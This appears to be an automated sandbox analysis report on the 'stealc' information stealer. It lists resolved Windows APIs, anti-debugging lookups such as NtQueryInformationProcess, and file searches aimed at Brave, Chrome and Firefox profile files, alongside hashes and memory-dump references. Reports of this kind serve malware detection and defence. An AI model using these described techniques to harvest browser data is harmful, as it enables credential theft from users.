The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1471E

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 0e9b9dd178c0714f37b770cf07643fda77799880f71229ec20b96fcda1cfdd53
Instruction ID: a32a56a104f17b7e8a45cfdecbb83e8769451e502e52c441da45abc888e7a517
Opcode Fuzzy Hash: 0e9b9dd178c0714f37b770cf07643fda77799880f71229ec20b96fcda1cfdd53
Instruction Fuzzy Hash: 3E417A75640608EBC728EFE4EC8DA9D7B75AB88B16F648045F5129D190CAF0D513BB33

Function 00F29860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01773918), ref: 00F298A1
GetProcAddress.KERNEL32(74DD0000,01773A20), ref: 00F298BA
GetProcAddress.KERNEL32(74DD0000,01773AC8), ref: 00F298D2
GetProcAddress.KERNEL32(74DD0000,01773930), ref: 00F298EA
GetProcAddress.KERNEL32(74DD0000,01773960), ref: 00F29903
GetProcAddress.KERNEL32(74DD0000,017703C0), ref: 00F2991B
GetProcAddress.KERNEL32(74DD0000,0176AD70), ref: 00F29933
GetProcAddress.KERNEL32(74DD0000,0176AEF0), ref: 00F2994C
GetProcAddress.KERNEL32(74DD0000,01773AE0), ref: 00F29964
GetProcAddress.KERNEL32(74DD0000,01773A50), ref: 00F2997C
GetProcAddress.KERNEL32(74DD0000,017737F8), ref: 00F29995
GetProcAddress.KERNEL32(74DD0000,01773990), ref: 00F299AD
GetProcAddress.KERNEL32(74DD0000,0176ADD0), ref: 00F299C5
GetProcAddress.KERNEL32(74DD0000,01773A68), ref: 00F299DE
GetProcAddress.KERNEL32(74DD0000,01773B10), ref: 00F299F6
GetProcAddress.KERNEL32(74DD0000,0176AF10), ref: 00F29A0E
GetProcAddress.KERNEL32(74DD0000,01773BA0), ref: 00F29A27
GetProcAddress.KERNEL32(74DD0000,01773B58), ref: 00F29A3F
GetProcAddress.KERNEL32(74DD0000,0176AF30), ref: 00F29A57
GetProcAddress.KERNEL32(74DD0000,01773B88), ref: 00F29A70
GetProcAddress.KERNEL32(74DD0000,0176AD10), ref: 00F29A88
LoadLibraryA.KERNEL32(01773B70,?,00F26A00), ref: 00F29A9A
LoadLibraryA.KERNEL32(01773B28,?,00F26A00), ref: 00F29AAB
LoadLibraryA.KERNEL32(01773BB8,?,00F26A00), ref: 00F29ABD
LoadLibraryA.KERNEL32(01773AF8,?,00F26A00), ref: 00F29ACF
LoadLibraryA.KERNEL32(01773B40,?,00F26A00), ref: 00F29AE0
GetProcAddress.KERNEL32(75A70000,01773DE0), ref: 00F29B02
GetProcAddress.KERNEL32(75290000,01773D98), ref: 00F29B23
GetProcAddress.KERNEL32(75290000,01773D08), ref: 00F29B3B
GetProcAddress.KERNEL32(75BD0000,01773C78), ref: 00F29B5D
GetProcAddress.KERNEL32(75450000,0176ABD0), ref: 00F29B7E
GetProcAddress.KERNEL32(76E90000,01773FD8), ref: 00F29B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00F29BB6

Strings

NtQueryInformationProcess, xrefs: 00F29BAA

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 934e8d978eae78a5a5103337a22c5cf9c4c8899c5b9a356a2b0078e5d2729f51
Instruction ID: 2d1ad02ab38791fd55a221319b544bde89cc8f6f283f248540877be088926aae
Opcode Fuzzy Hash: 934e8d978eae78a5a5103337a22c5cf9c4c8899c5b9a356a2b0078e5d2729f51
Instruction Fuzzy Hash: FEA12AB5590744DFD36CEFA8F5989563BF9FF88202704473AA7268324CD63A98C1DB50

Function 00F1BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

FindFirstFileA.KERNEL32(00000000,?,00F30B32,00F30B2B,00000000,?,?,?,00F313F4,00F30B2A), ref: 00F1BEF5
StrCmpCA.SHLWAPI(?,00F313F8), ref: 00F1BF4D
StrCmpCA.SHLWAPI(?,00F313FC), ref: 00F1BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 00F1C7BF
FindClose.KERNEL32(000000FF), ref: 00F1C7D1

Strings

\Brave\Preferences, xrefs: 00F1C1DB
Preferences, xrefs: 00F1C11E
Google Chrome, xrefs: 00F1C634
Brave, xrefs: 00F1C102

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: aca3cce0c1e4631eeec63982261d9df0b00988d84c5c5cf82b6297ac4f24ca04
Instruction ID: 53dac2972eb0f500c86e47e1978e082a8138570e208330ad673cd95b81645cfa
Opcode Fuzzy Hash: aca3cce0c1e4631eeec63982261d9df0b00988d84c5c5cf82b6297ac4f24ca04
Instruction Fuzzy Hash: 514258729101189BDB14FB70ED96EED737DAF94300F404568F50A97181EF389B89EBA2

Function 6BF535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6BFDF688,00001000), ref: 6BF535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BF535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6BF535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BF5363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BF5369F
__aulldiv.LIBCMT ref: 6BF536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6BF53773
EnterCriticalSection.KERNEL32(6BFDF688), ref: 6BF5377E
LeaveCriticalSection.KERNEL32(6BFDF688), ref: 6BF537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6BF537C4
EnterCriticalSection.KERNEL32(6BFDF688), ref: 6BF537CB
LeaveCriticalSection.KERNEL32(6BFDF688), ref: 6BF53801
__aulldiv.LIBCMT ref: 6BF53883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6BF53902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6BF53918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6BF5394C

Strings

GenuntelineI, xrefs: 6BF53639
QPC, xrefs: 6BF538FC
AuthcAMDenti, xrefs: 6BF53946
MOZ_TIMESTAMP_MODE, xrefs: 6BF535DB
GTC, xrefs: 6BF53912

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 4abb40f502286e371ace6426e9fe3330da90fb7543af3007db4d576a93868a2f
Instruction ID: 42e68a587bb60295555adbfa412f6ad5105c1479858b31647b683c7901bfb8b0
Opcode Fuzzy Hash: 4abb40f502286e371ace6426e9fe3330da90fb7543af3007db4d576a93868a2f
Instruction Fuzzy Hash: D1B184B3A283109BDB58DF38C854B1AB7E5EBD9700F05892DE499D37B0D774D9088B91

Function 00F24910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00F2492C
FindFirstFileA.KERNEL32(?,?), ref: 00F24943
StrCmpCA.SHLWAPI(?,00F30FDC), ref: 00F24971
StrCmpCA.SHLWAPI(?,00F30FE0), ref: 00F24987
FindNextFileA.KERNEL32(000000FF,?), ref: 00F24B7D
FindClose.KERNEL32(000000FF), ref: 00F24B92

Strings

%s\*, xrefs: 00F24920
%s\%s, xrefs: 00F249A4
%s\%s, xrefs: 00F249FB

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: a1c08be4a8812651f762b03e6649288061795199c971d987ac3f98ceb8eca975
Instruction ID: c3949171218fb8ac26fcac8b6d61b389dcb58472a6b7f8e26d758a9a6454ea93
Opcode Fuzzy Hash: a1c08be4a8812651f762b03e6649288061795199c971d987ac3f98ceb8eca975
Instruction Fuzzy Hash: 636156B1900218ABCB34EBA0EC45EEA737CBF48701F044698B61997145EF75EB85DFA1

Function 00F23EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00F23EC3
FindFirstFileA.KERNEL32(?,?), ref: 00F23EDA
StrCmpCA.SHLWAPI(?,00F30FAC), ref: 00F23F08
StrCmpCA.SHLWAPI(?,00F30FB0), ref: 00F23F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 00F2406C
FindClose.KERNEL32(000000FF), ref: 00F24081

Strings

%s\%s, xrefs: 00F23EB7

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: c39009386e5853c3079e2ce2e17b0f3d398c625905519ab740baf9625eac0ed0
Instruction ID: ded81f6cc28c766bbfb031ecf4eea7c836cba6646192b13ac5f5ec54b072e942
Opcode Fuzzy Hash: c39009386e5853c3079e2ce2e17b0f3d398c625905519ab740baf9625eac0ed0
Instruction Fuzzy Hash: 245135B2900218EBCB24EBB0EC85EEA777CBF44700F404699B65997044DB75EBC99F91

Function 00F1F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F315B8,00F30D96), ref: 00F1F71E
StrCmpCA.SHLWAPI(?,00F315BC), ref: 00F1F76F
StrCmpCA.SHLWAPI(?,00F315C0), ref: 00F1F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 00F1FAB1
FindClose.KERNEL32(000000FF), ref: 00F1FAC3

Strings

prefs.js, xrefs: 00F1F812

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
